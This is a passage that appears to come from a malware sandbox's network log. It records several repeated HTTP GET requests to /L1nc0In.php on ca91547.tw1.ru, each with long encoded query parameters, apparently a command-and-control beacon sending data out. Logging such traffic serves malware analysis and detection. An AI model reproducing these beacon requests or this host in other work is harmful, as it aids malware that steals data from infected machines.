S2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
